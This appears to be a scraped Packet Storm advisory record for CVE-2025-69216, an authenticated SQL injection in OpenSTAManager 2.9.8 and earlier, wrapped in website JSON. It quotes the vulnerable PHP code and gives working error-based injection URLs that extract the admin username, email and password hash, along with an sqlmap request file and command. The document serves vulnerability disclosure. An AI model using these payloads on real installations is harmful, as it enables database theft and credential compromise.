{“lastseen”:”2026-04-13T15:49:41″,”description”:”OpenSTAManager versions 2.9.8 and below suffer from a remote SQL injection vulnerability in the Scadenzario Print Template…”,”published”:”2026-04-13T00:00:00″,”modified”:”2026-04-13T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:218752″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-69216″],”sourceData”:”# CVE-2025-69216: OpenSTAManager has a SQL Injection in Scadenzario Print Template\\n \\n ## Overview\\n \\n | Field | Details |\\n |—|—|\\n | **CVE ID** | [CVE-2025-69216](https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2025-69216) |\\n | **Severity** | HIGH |\\n | **Advisory** | [View Advisory](https:\/\/github.com\/devcode-it\/openstamanager\/security\/advisories\/GHSA-q6g3-fv43-m2w6) |\\n | **Discovered by** | [Lukasz Rybak](https:\/\/github.com\/lukasz-rybak) |\\n \\n ## Affected Products\\n \\n – **devcode-it\/openstamanager** (versions: \\u003c= 2.9.8)\\n \\n \\n ## CWE Classification\\n \\n – CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)\\n \\n ## Details\\n \\n ### Summary\\n An **authenticated SQL injection vulnerability** in OpenSTAManager’s Scadenzario (Payment Schedule) print template allows any authenticated user to extract sensitive data from the database, including admin credentials, customer information, and financial records. The vulnerability enables complete database read access through error-based SQL injection techniques.\\n \\n ### Details\\n \\n The vulnerability exists in `templates\/scadenzario\/init.php` at **line 46**, where the `id_anagrafica` parameter is directly concatenated into an SQL query without proper sanitization:\\n \\n **Vulnerable Code:**\\n “`php\\n if (get(‘id_anagrafica’) \\u0026\\u0026 get(‘id_anagrafica’) != ‘null’) {\\n $module_query = str_replace(‘1=1’, ‘1=1 AND `co_scadenziario`.`idanagrafica`=\\”‘.get(‘id_anagrafica’).’\\”‘, $module_query);\\n $id_anagrafica = get(‘id_anagrafica’);\\n }\\n “`\\n \\n The `get()` function retrieves user input from GET\/POST parameters without validation. The parameter value is directly embedded into the SQL query string using string concatenation instead of using the application’s `prepare()` sanitization function, enabling SQL injection attacks.\\n \\n **Root Cause:**\\n – Missing use of `prepare()` function for input sanitization\\n – Direct string concatenation in SQL query construction\\n – No input validation or type checking\\n \\n **Affected Endpoint:**\\n “`\\n \/pdfgen.php?ptype=scadenzario\\u0026id_anagrafica=[INJECTION_PAYLOAD]\\n “`\\n \\n **Affected Files:**\\n – `templates\/scadenzario\/init.php` (line 46) – **Primary vulnerability**\\n – `templates\/scadenzario\/init.php` (lines 34, 40) – Similar pattern with date parameters\\n – `pdfgen.php` – Entry point for template rendering\\n \\n \\n —\\n \\n ### PoC (Proof of Concept)\\n \\n #### Prerequisites\\n – Valid authenticated session (any user role)\\n \\n #### Exploitation Steps\\n \\n **1. Confirm Vulnerability – Basic Syntax Error Test:**\\n “`bash\\n http:\/\/localhost:8081\/pdfgen.php?ptype=scadenzario\\u0026id_anagrafica=1%22%20–%20\\n “`\\n \\n SQL syntax error displayed in application response\\n \\n \\u003cimg width=\\”2195\\” height=\\”392\\” alt=\\”image\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/f62ca7b4-2397-4f90-8698-6cf7f867d102\\” \/\\u003e\\n \\n —\\n \\n **2. Extract Database Version – Error-Based SQLi:**\\n “`bash\\n http:\/\/localhost:8081\/pdfgen.php?ptype=scadenzario\\u0026id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,VERSION(),0x7e))%20AND%20%221%22=%221\\n “`\\n \\n **Result:** `~8.3.0~` (MySQL version)\\n \\n \\u003cimg width=\\”2061\\” height=\\”378\\” alt=\\”image\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/8ea16c47-36cc-4c25-a624-b42ccfcdf52f\\” \/\\u003e\\n \\n —\\n \\n **3. Extract Database Name:**\\n “`bash\\n http:\/\/localhost:8081\/pdfgen.php?ptype=scadenzario\\u0026id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,database(),0x7e))%20AND%20%221%22=%221\\n “`\\n \\n **Result:** `~openstamanager~`\\n \\n \\u003cimg width=\\”1954\\” height=\\”345\\” alt=\\”image\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/47479297-5271-4c03-b242-efa513eb28f8\\” \/\\u003e\\n \\n —\\n \\n **4. Extract Admin Username:**\\n “`bash\\n http:\/\/localhost:8081\/pdfgen.php?ptype=scadenzario\\u0026id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20username%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221\\n “`\\n \\n **Result:** `~admin~`\\n \\u003cimg width=\\”1998\\” height=\\”332\\” alt=\\”image\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/9f8363cb-8da9-4e8f-8744-ef38c9706be8\\” \/\\u003e\\n \\n —\\n \\n **5. Extract Admin Email:**\\n “`bash\\n http:\/\/localhost:8081\/pdfgen.php?ptype=scadenzario\\u0026id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20email%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221\\n “`\\n \\n **Result:** Admin email address\\n \\n \\u003cimg width=\\”2006\\” height=\\”339\\” alt=\\”image\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/4dcd5ea4-4eea-4730-8d39-b8ce2da46e84\\” \/\\u003e\\n \\n —\\n \\n **6. Extract Password Hash (Partial – XPATH 31 char limit):**\\n “`bash\\n http:\/\/localhost:8081\/pdfgen.php?ptype=scadenzario\\u0026id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20password%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221\\n “`\\n \\n **Result:** bcrypt password hash\\n \\n \\u003cimg width=\\”1924\\” height=\\”328\\” alt=\\”image\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/27b711f3-9bb6-4909-a5bd-a04177c9f219\\” \/\\u003e\\n \\n —\\n \\n **7. Automated Exploitation with SQLMap:**\\n \\n Create request file `sqli_osm.req`:\\n “`http\\n GET \/pdfgen.php?ptype=scadenzario\\u0026id_anagrafica=1* HTTP\/1.1\\n Host: localhost:8081\\n Cookie: PHPSESSID=[SESSION_COOKIE]\\n User-Agent: Mozilla\/5.0\\n “`\\n \\n Run SQLMap:\\n “`bash\\n sqlmap -r sqli_osm.req –level 3 –risk 3 –dbs\\n “`\\n \\n **SQLMap Confirmed Injection Types:**\\n – \u2705 Boolean-based blind SQL injection\\n – \u2705 Error-based SQL injection (MySQL \\u003e= 5.6 GTID_SUBSET)\\n – \u2705 Time-based blind SQL injection (SLEEP)\\n \\n \\u003cimg width=\\”1498\\” height=\\”516\\” alt=\\”image\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/b733f025-ac4b-4b36-a20e-76d826005f62\\” \/\\u003e\\n \\n —\\n \\n ### Impact\\n \\n **Who is Impacted:**\\n – \u2705 **All authenticated users** – Any user with valid credentials can exploit this vulnerability\\n – \u2705 **Low-privilege users** – Even users with minimal permissions can access admin-level data\\n – \u2705 **All OpenSTAManager installations** – Vulnerability exists in the latest master branch\\n —\\n \\n ### Attribution\\n Reported by \u0141ukasz Rybak\\n \\n ## References\\n \\n – https:\/\/github.com\/devcode-it\/openstamanager\/security\/advisories\/GHSA-q6g3-fv43-m2w6\\n – https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2025-69216\\n – https:\/\/github.com\/advisories\/GHSA-q6g3-fv43-m2w6\\n \\n \\n ## Disclaimer\\n \\n This CVE was responsibly disclosed following coordinated vulnerability disclosure practices. The information provided here is for educational and defensive purposes only.”,”sourceHref”:”https:\/\/packetstorm.news\/download\/218752″,”cvss”:{“score”:8.7,”severity”:”HIGH”,”vector”:”CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:L\/UI:N\/VC:H\/SC:N\/VI:H\/SI:N\/VA:H\/SA:N”,”version”:”4.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/218752\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-13T15:49:41″,”description”:”OpenSTAManager versions 2.9.8 and below suffer from a remote SQL injection vulnerability in the Scadenzario Print Template…”,”published”:”2026-04-13T00:00:00″,”modified”:”2026-04-13T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:218752″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-69216″],”sourceData”:”# CVE-2025-69216: OpenSTAManager has a…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,19,12,15,13,53,7,11,5],"class_list":["post-46300","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-87","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n